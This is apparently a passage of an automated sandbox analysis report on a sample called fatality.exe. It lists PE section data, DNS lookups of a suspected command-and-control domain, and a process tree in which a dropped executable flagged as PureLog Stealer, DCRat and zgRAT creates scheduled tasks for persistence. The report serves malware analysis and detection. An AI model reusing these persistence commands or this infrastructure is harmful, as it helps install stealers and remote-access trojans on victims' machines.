                                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x72000 | 0x80a8 | .rsrc
                                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                                                                  IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x2fa000 | 0xc | cheat
                                                                  IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                                                  IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                                                  IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
                                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                                                                  IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                                                                  Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                                                   | 0x1000 | 0x32000 | 0x1be00 | 9104f0fc531fdf9fb96d123dff1a3498 | False | 0.997276135089686 | data | 7.996600566459323 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                   | 0x33000 | 0xb000 | 0x4800 | 9fe47bef5d465074276288c8d112b546 | False | 0.9945203993055556 | data | 7.979119292488003 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                   | 0x3e000 | 0x25000 | 0x800 | eea4f8d774a89c545bc83f48802e8435 | False | 0.91259765625 | data | 7.461008587981874 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                   | 0x63000 | 0x1000 | 0x200 | a20984dd380aa28b3e8ab1be07362b77 | False | 0.447265625 | data | 3.7456848543919192 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                   | 0x64000 | 0xb000 | 0x2600 | aafc380576beb683e5abda82733f92a5 | False | 0.9828330592105263 | data | 7.941503255275258 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                   | 0x6f000 | 0x3000 | 0x2000 | c8693ac1d184eed23769063f48116844 | False | 0.95849609375 | PGP Secret Sub-key - | 7.853249739854464 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                  .rsrc | 0x72000 | 0x9000 | 0x8200 | 677d04097b2c351f09c78ba10bd35085 | False | 0.854296875 | data | 7.51495699813517 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                   | 0x7b000 | 0x27f000 | 0x2ba00 | f226c5562cd864a0b52094a3f8dcf332 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                  cheat | 0x2fa000 | 0xe7000 | 0xe7000 | c387e7f409bd96385ca608c515b0e8ef | False | 0.9969160071699135 | data | 7.982180837051556 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                  Name | RVA | Size | Type | Language | Country | ZLIB Complexity
                                                                  PNG | 0x64524 | 0xb45 | OpenPGP Public Key | English | United States | 1.0038128249566725
                                                                  PNG | 0x6506c | 0x15a9 | data | English | United States | 0.970492396813903
                                                                  RT_ICON | 0x72524 | 0x63a4 | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | | | 1.0004704406460718
                                                                  RT_DIALOG | 0x6c9bc | 0x286 | empty | English | United States | 0
                                                                  RT_DIALOG | 0x6cc44 | 0x13a | empty | English | United States | 0
                                                                  RT_DIALOG | 0x6cd80 | 0xec | empty | English | United States | 0
                                                                  RT_DIALOG | 0x6ce6c | 0x12e | empty | English | United States | 0
                                                                  RT_DIALOG | 0x6cf9c | 0x338 | empty | English | United States | 0
                                                                  RT_DIALOG | 0x6d2d4 | 0x252 | empty | English | United States | 0
                                                                  RT_STRING | 0x788c8 | 0x1e2 | data | English | United States | 0.3900414937759336
                                                                  RT_STRING | 0x78aac | 0x1cc | data | English | United States | 0.4282608695652174
                                                                  RT_STRING | 0x78c78 | 0x1b8 | data | English | United States | 0.45681818181818185
                                                                  RT_STRING | 0x78e30 | 0x146 | data | English | United States | 0.5153374233128835
                                                                  RT_STRING | 0x78f78 | 0x46c | data | English | United States | 0.3454063604240283
                                                                  RT_STRING | 0x793e4 | 0x166 | data | English | United States | 0.49162011173184356
                                                                  RT_STRING | 0x7954c | 0x152 | data | English | United States | 0.5059171597633136
                                                                  RT_STRING | 0x796a0 | 0x10a | data | English | United States | 0.49624060150375937
                                                                  RT_STRING | 0x797ac | 0xbc | data | English | United States | 0.6329787234042553
                                                                  RT_STRING | 0x79868 | 0xd6 | data | English | United States | 0.5747663551401869
                                                                  RT_GROUP_ICON | 0x79940 | 0x14 | data | | | 1.05
                                                                  RT_MANIFEST | 0x79954 | 0x753 | XML 1.0 document, ASCII text, with CRLF line terminators | English | United States | 0.3957333333333333
                                                                  DLL | Import
                                                                  kernel32.dll | GetModuleHandleA, GetProcAddress, ExitProcess, LoadLibraryA
                                                                  user32.dll | MessageBoxA
                                                                  advapi32.dll | RegCloseKey
                                                                  oleaut32.dll | SysFreeString
                                                                  gdi32.dll | CreateFontA
                                                                  shell32.dll | ShellExecuteA
                                                                  version.dll | GetFileVersionInfoA
                                                                  gdiplus.dll | GdipAlloc
                                                                  Language of compilation system | Country where language is spoken | Map
                                                                  English | United States |
                                                                  Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                  Jan 13, 2025 12:48:32.196950912 CET | 56338 | 53 | 192.168.2.5 | 162.159.36.2
                                                                  Jan 13, 2025 12:48:32.202265024 CET | 53 | 56338 | 162.159.36.2 | 192.168.2.5
                                                                  Jan 13, 2025 12:48:32.202341080 CET | 56338 | 53 | 192.168.2.5 | 162.159.36.2
                                                                  Jan 13, 2025 12:48:32.207901001 CET | 53 | 56338 | 162.159.36.2 | 192.168.2.5
                                                                  Jan 13, 2025 12:48:32.719033003 CET | 56338 | 53 | 192.168.2.5 | 162.159.36.2
                                                                  Jan 13, 2025 12:48:32.723850012 CET | 56338 | 53 | 192.168.2.5 | 162.159.36.2
                                                                  Jan 13, 2025 12:48:32.729027987 CET | 53 | 56338 | 162.159.36.2 | 192.168.2.5
                                                                  Jan 13, 2025 12:48:32.729090929 CET | 56338 | 53 | 192.168.2.5 | 162.159.36.2
                                                                  Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                  Jan 13, 2025 12:48:23.805847883 CET | 53824 | 53 | 192.168.2.5 | 1.1.1.1
                                                                  Jan 13, 2025 12:48:24.120889902 CET | 53 | 53824 | 1.1.1.1 | 192.168.2.5
                                                                  Jan 13, 2025 12:48:32.196382046 CET | 53 | 63607 | 162.159.36.2 | 192.168.2.5
                                                                  Jan 13, 2025 12:48:32.747226954 CET | 58719 | 53 | 192.168.2.5 | 1.1.1.1
                                                                  Jan 13, 2025 12:48:32.754957914 CET | 53 | 58719 | 1.1.1.1 | 192.168.2.5
                                                                  Jan 13, 2025 12:48:46.320416927 CET | 53120 | 53 | 192.168.2.5 | 1.1.1.1
                                                                  Jan 13, 2025 12:48:46.768088102 CET | 53 | 53120 | 1.1.1.1 | 192.168.2.5
                                                                  Jan 13, 2025 12:48:53.667042971 CET | 60405 | 53 | 192.168.2.5 | 1.1.1.1
                                                                  Jan 13, 2025 12:48:53.981053114 CET | 53 | 60405 | 1.1.1.1 | 192.168.2.5
                                                                  Jan 13, 2025 12:49:11.259903908 CET | 57046 | 53 | 192.168.2.5 | 1.1.1.1
                                                                  Jan 13, 2025 12:49:11.735621929 CET | 53 | 57046 | 1.1.1.1 | 192.168.2.5
                                                                  Jan 13, 2025 12:49:19.297024965 CET | 56234 | 53 | 192.168.2.5 | 1.1.1.1
                                                                  Jan 13, 2025 12:49:19.453996897 CET | 53 | 56234 | 1.1.1.1 | 192.168.2.5
                                                                  Jan 13, 2025 12:49:27.416022062 CET | 62022 | 53 | 192.168.2.5 | 1.1.1.1
                                                                  Jan 13, 2025 12:49:27.429466963 CET | 53 | 62022 | 1.1.1.1 | 192.168.2.5
                                                                  Jan 13, 2025 12:49:51.112107992 CET | 59391 | 53 | 192.168.2.5 | 1.1.1.1
                                                                  Jan 13, 2025 12:49:51.131388903 CET | 53 | 59391 | 1.1.1.1 | 192.168.2.5
                                                                  Jan 13, 2025 12:49:59.438361883 CET | 52998 | 53 | 192.168.2.5 | 1.1.1.1
                                                                  Jan 13, 2025 12:49:59.674460888 CET | 53 | 52998 | 1.1.1.1 | 192.168.2.5
                                                                  Jan 13, 2025 12:50:06.353496075 CET | 57692 | 53 | 192.168.2.5 | 1.1.1.1
                                                                  Jan 13, 2025 12:50:06.503123999 CET | 53 | 57692 | 1.1.1.1 | 192.168.2.5
                                                                  Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                                                                  Jan 13, 2025 12:48:23.805847883 CET | 192.168.2.5 | 1.1.1.1 | 0x72b1 | Standard query (0) | 373292cm.nyashka.top | A (IP address) | IN (0x0001) | false
                                                                  Jan 13, 2025 12:48:32.747226954 CET | 192.168.2.5 | 1.1.1.1 | 0xa786 | Standard query (0) | 15.164.165.52.in-addr.arpa | PTR (Pointer record) | IN (0x0001) | false
                                                                  Jan 13, 2025 12:48:46.320416927 CET | 192.168.2.5 | 1.1.1.1 | 0xca2a | Standard query (0) | 373292cm.nyashka.top | A (IP address) | IN (0x0001) | false
                                                                  Jan 13, 2025 12:48:53.667042971 CET | 192.168.2.5 | 1.1.1.1 | 0x38d5 | Standard query (0) | 373292cm.nyashka.top | A (IP address) | IN (0x0001) | false
                                                                  Jan 13, 2025 12:49:11.259903908 CET | 192.168.2.5 | 1.1.1.1 | 0xaf4e | Standard query (0) | 373292cm.nyashka.top | A (IP address) | IN (0x0001) | false
                                                                  Jan 13, 2025 12:49:19.297024965 CET | 192.168.2.5 | 1.1.1.1 | 0x1670 | Standard query (0) | 373292cm.nyashka.top | A (IP address) | IN (0x0001) | false
                                                                  Jan 13, 2025 12:49:27.416022062 CET | 192.168.2.5 | 1.1.1.1 | 0xc892 | Standard query (0) | 373292cm.nyashka.top | A (IP address) | IN (0x0001) | false
                                                                  Jan 13, 2025 12:49:51.112107992 CET | 192.168.2.5 | 1.1.1.1 | 0x34dc | Standard query (0) | 373292cm.nyashka.top | A (IP address) | IN (0x0001) | false
                                                                  Jan 13, 2025 12:49:59.438361883 CET | 192.168.2.5 | 1.1.1.1 | 0x74a0 | Standard query (0) | 373292cm.nyashka.top | A (IP address) | IN (0x0001) | false
                                                                  Jan 13, 2025 12:50:06.353496075 CET | 192.168.2.5 | 1.1.1.1 | 0x238a | Standard query (0) | 373292cm.nyashka.top | A (IP address) | IN (0x0001) | false
                                                                  Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                                                                  Jan 13, 2025 12:48:24.120889902 CET | 1.1.1.1 | 192.168.2.5 | 0x72b1 | Server failure (2) | 373292cm.nyashka.top | none | none | A (IP address) | IN (0x0001) | false
                                                                  Jan 13, 2025 12:48:32.754957914 CET | 1.1.1.1 | 192.168.2.5 | 0xa786 | Name error (3) | 15.164.165.52.in-addr.arpa | none | none | PTR (Pointer record) | IN (0x0001) | false
                                                                  Jan 13, 2025 12:48:46.768088102 CET | 1.1.1.1 | 192.168.2.5 | 0xca2a | Server failure (2) | 373292cm.nyashka.top | none | none | A (IP address) | IN (0x0001) | false
                                                                  Jan 13, 2025 12:48:53.981053114 CET | 1.1.1.1 | 192.168.2.5 | 0x38d5 | Server failure (2) | 373292cm.nyashka.top | none | none | A (IP address) | IN (0x0001) | false
                                                                  Jan 13, 2025 12:49:11.735621929 CET | 1.1.1.1 | 192.168.2.5 | 0xaf4e | Server failure (2) | 373292cm.nyashka.top | none | none | A (IP address) | IN (0x0001) | false
                                                                  Jan 13, 2025 12:49:19.453996897 CET | 1.1.1.1 | 192.168.2.5 | 0x1670 | Server failure (2) | 373292cm.nyashka.top | none | none | A (IP address) | IN (0x0001) | false
                                                                  Jan 13, 2025 12:49:27.429466963 CET | 1.1.1.1 | 192.168.2.5 | 0xc892 | Server failure (2) | 373292cm.nyashka.top | none | none | A (IP address) | IN (0x0001) | false
                                                                  Jan 13, 2025 12:49:51.131388903 CET | 1.1.1.1 | 192.168.2.5 | 0x34dc | Server failure (2) | 373292cm.nyashka.top | none | none | A (IP address) | IN (0x0001) | false
                                                                  Jan 13, 2025 12:49:59.674460888 CET | 1.1.1.1 | 192.168.2.5 | 0x74a0 | Server failure (2) | 373292cm.nyashka.top | none | none | A (IP address) | IN (0x0001) | false
                                                                  Jan 13, 2025 12:50:06.503123999 CET | 1.1.1.1 | 192.168.2.5 | 0x238a | Server failure (2) | 373292cm.nyashka.top | none | none | A (IP address) | IN (0x0001) | false


                                                                  Target ID:0
                                                                  Start time:06:47:59
                                                                  Start date:13/01/2025
                                                                  Path:C:\Users\user\Desktop\fatality.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:"C:\Users\user\Desktop\fatality.exe"
                                                                  Imagebase:0xde0000
                                                                  File size:3'319'076 bytes
                                                                  MD5 hash:A7040B85FC683F088F4C6E5B44052C43
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:Borland Delphi
                                                                  Yara matches:
                                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000003.2039419279.0000000005FE3000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000003.2038554623.0000000005FE7000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                  Reputation:low
                                                                  Has exited:true

                                                                  Target ID:2
                                                                  Start time:06:48:00
                                                                  Start date:13/01/2025
                                                                  Path:C:\Windows\SysWOW64\wscript.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:"C:\Windows\System32\WScript.exe" "C:\blockcomSession\RezYUes00TmmVGwINjr2qWMSbF3Etb9Bt2Ra62zGWDtewTBc.vbe"
                                                                  Imagebase:0x290000
                                                                  File size:147'456 bytes
                                                                  MD5 hash:FF00E0480075B095948000BDC66E81F0
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  Target ID:3
                                                                  Start time:06:48:11
                                                                  Start date:13/01/2025
                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:C:\Windows\system32\cmd.exe /c ""C:\blockcomSession\R3z0peym99fhJdrKbUwEGrQMoM2HpnSPGrE0X0k2hc.bat" "
                                                                  Imagebase:0x790000
                                                                  File size:236'544 bytes
                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  Target ID:4
                                                                  Start time:06:48:11
                                                                  Start date:13/01/2025
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff6d64d0000
                                                                  File size:862'208 bytes
                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  Target ID:5
                                                                  Start time:06:48:11
                                                                  Start date:13/01/2025
                                                                  Path:C:\blockcomSession\containerReview.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:"C:\blockcomSession/containerReview.exe"
                                                                  Imagebase:0x780000
                                                                  File size:2'006'016 bytes
                                                                  MD5 hash:F568E43BC473CD8CEB2553C58194DF61
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Yara matches:
                                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000005.00000000.2154251143.0000000000782000.00000002.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000005.00000002.2227774812.0000000012D60000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\blockcomSession\containerReview.exe, Author: Joe Security
                                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\blockcomSession\containerReview.exe, Author: Joe Security
                                                                  Antivirus matches:
                                                                  • Detection: 100%, Avira
                                                                  • Detection: 100%, Joe Sandbox ML
                                                                  • Detection: 83%, ReversingLabs
                                                                  Reputation:low
                                                                  Has exited:true

                                                                  Target ID:6
                                                                  Start time:06:48:14
                                                                  Start date:13/01/2025
                                                                  Path:C:\Windows\System32\schtasks.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:schtasks.exe /create /tn "mQBLhXIPAJm" /sc MINUTE /mo 10 /tr "'C:\Program Files\7-Zip\Lang\mQBLhXIPAJ.exe'" /f
                                                                  Imagebase:0x7ff7f36d0000
                                                                  File size:235'008 bytes
                                                                  MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  Target ID:7
                                                                  Start time:06:48:14
                                                                  Start date:13/01/2025
                                                                  Path:C:\Windows\System32\schtasks.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:schtasks.exe /create /tn "mQBLhXIPAJ" /sc ONLOGON /tr "'C:\Program Files\7-Zip\Lang\mQBLhXIPAJ.exe'" /rl HIGHEST /f
                                                                  Imagebase:0x7ff7f36d0000
                                                                  File size:235'008 bytes
                                                                  MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  Target ID:8
                                                                  Start time:06:48:14
                                                                  Start date:13/01/2025
                                                                  Path:C:\Windows\System32\schtasks.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:schtasks.exe /create /tn "mQBLhXIPAJm" /sc MINUTE /mo 9 /tr "'C:\Program Files\7-Zip\Lang\mQBLhXIPAJ.exe'" /rl HIGHEST /f
                                                                  Imagebase:0x7ff7f36d0000
                                                                  File size:235'008 bytes
                                                                  MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  Target ID:9
                                                                  Start time:06:48:14
                                                                  Start date:13/01/2025
                                                                  Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\qvvd4xnd\qvvd4xnd.cmdline"
                                                                  Imagebase:0x7ff7080b0000
                                                                  File size:2'759'232 bytes
                                                                  MD5 hash:F65B029562077B648A6A5F6A1AA76A66
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:moderate
                                                                  Has exited:true

                                                                  Target ID:10
                                                                  Start time:06:48:14
                                                                  Start date:13/01/2025
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff6d64d0000
                                                                  File size:862'208 bytes
                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  Target ID:11
                                                                  Start time:06:48:14
                                                                  Start date:13/01/2025
                                                                  Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES8539.tmp" "c:\Program Files (x86)\Microsoft\Edge\Application\CSC4E919528C4A844BA8820AEF1C7C5AE5.TMP"
                                                                  Imagebase:0x7ff61b250000
                                                                  File size:52'744 bytes
                                                                  MD5 hash:C877CBB966EA5939AA2A17B6A5160950
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  Target ID:13
                                                                  Start time:06:48:15
                                                                  Start date:13/01/2025
                                                                  Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\glp1j4aa\glp1j4aa.cmdline"
                                                                  Imagebase:0x7ff7080b0000
                                                                  File size:2'759'232 bytes
                                                                  MD5 hash:F65B029562077B648A6A5F6A1AA76A66
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:moderate
                                                                  Has exited:true

                                                                  Target ID:14
                                                                  Start time:06:48:15
                                                                  Start date:13/01/2025
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff6d64d0000
                                                                  File size:862'208 bytes
                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  Target ID:15
                                                                  Start time:06:48:15
                                                                  Start date:13/01/2025
                                                                  Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES87BA.tmp" "c:\Windows\System32\CSCBCEC8111DA4C46C5BB72BE8163F3D647.TMP"
                                                                  Imagebase:0x7ff61b250000
                                                                  File size:52'744 bytes
                                                                  MD5 hash:C877CBB966EA5939AA2A17B6A5160950
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  Target ID:16
                                                                  Start time:06:48:15
                                                                  Start date:13/01/2025
                                                                  Path:C:\Windows\System32\schtasks.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:schtasks.exe /create /tn "mQBLhXIPAJm" /sc MINUTE /mo 13 /tr "'C:\blockcomSession\mQBLhXIPAJ.exe'" /f
                                                                  Imagebase:0x7ff7f36d0000
                                                                  File size:235'008 bytes
                                                                  MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  Target ID:17
                                                                  Start time:06:48:16
                                                                  Start date:13/01/2025
                                                                  Path:C:\Windows\System32\schtasks.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:schtasks.exe /create /tn "mQBLhXIPAJ" /sc ONLOGON /tr "'C:\blockcomSession\mQBLhXIPAJ.exe'" /rl HIGHEST /f
                                                                  Imagebase:0x7ff7f36d0000
                                                                  File size:235'008 bytes
                                                                  MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  Target ID:18
                                                                  Start time:06:48:16
                                                                  Start date:13/01/2025
                                                                  Path:C:\Windows\System32\schtasks.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:schtasks.exe /create /tn "mQBLhXIPAJm" /sc MINUTE /mo 14 /tr "'C:\blockcomSession\mQBLhXIPAJ.exe'" /rl HIGHEST /f
                                                                  Imagebase:0x7ff7f36d0000
                                                                  File size:235'008 bytes
                                                                  MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  Target ID:19
                                                                  Start time:06:48:16
                                                                  Start date:13/01/2025
                                                                  Path:C:\blockcomSession\mQBLhXIPAJ.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\blockcomSession\mQBLhXIPAJ.exe
                                                                  Imagebase:0x300000
                                                                  File size:2'006'016 bytes
                                                                  MD5 hash:F568E43BC473CD8CEB2553C58194DF61
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Antivirus matches:
                                                                  • Detection: 83%, ReversingLabs
                                                                  Has exited:true

                                                                  Target ID:20
                                                                  Start time:06:48:16
                                                                  Start date:13/01/2025
                                                                  Path:C:\Windows\System32\schtasks.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:schtasks.exe /create /tn "containerReviewc" /sc MINUTE /mo 14 /tr "'C:\Users\All Users\dbg\containerReview.exe'" /f
                                                                  Imagebase:0x7ff7f36d0000
                                                                  File size:235'008 bytes
                                                                  MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  Target ID:21
                                                                  Start time:06:48:16
                                                                  Start date:13/01/2025
                                                                  Path:C:\Windows\System32\schtasks.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:schtasks.exe /create /tn "containerReview" /sc ONLOGON /tr "'C:\Users\All Users\dbg\containerReview.exe'" /rl HIGHEST /f
                                                                  Imagebase:0x7ff7f36d0000
                                                                  File size:235'008 bytes
                                                                  MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  Target ID:22
                                                                  Start time:06:48:16
                                                                  Start date:13/01/2025
                                                                  Path:C:\blockcomSession\mQBLhXIPAJ.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\blockcomSession\mQBLhXIPAJ.exe
                                                                  Imagebase:0xf10000
                                                                  File size:2'006'016 bytes
                                                                  MD5 hash:F568E43BC473CD8CEB2553C58194DF61
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  Target ID:23
                                                                  Start time:06:48:16
                                                                  Start date:13/01/2025
                                                                  Path:C:\Windows\System32\schtasks.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:schtasks.exe /create /tn "containerReviewc" /sc MINUTE /mo 5 /tr "'C:\Users\All Users\dbg\containerReview.exe'" /rl HIGHEST /f
                                                                  Imagebase:0x7ff7f36d0000
                                                                  File size:235'008 bytes
                                                                  MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  Target ID:24
                                                                  Start time:06:48:17
                                                                  Start date:13/01/2025
                                                                  Path:C:\Windows\System32\schtasks.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:schtasks.exe /create /tn "mQBLhXIPAJm" /sc MINUTE /mo 13 /tr "'C:\Users\Default\Templates\mQBLhXIPAJ.exe'" /f
                                                                  Imagebase:0x7ff7f36d0000
                                                                  File size:235'008 bytes
                                                                  MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  Target ID:25
                                                                  Start time:06:48:17
                                                                  Start date:13/01/2025
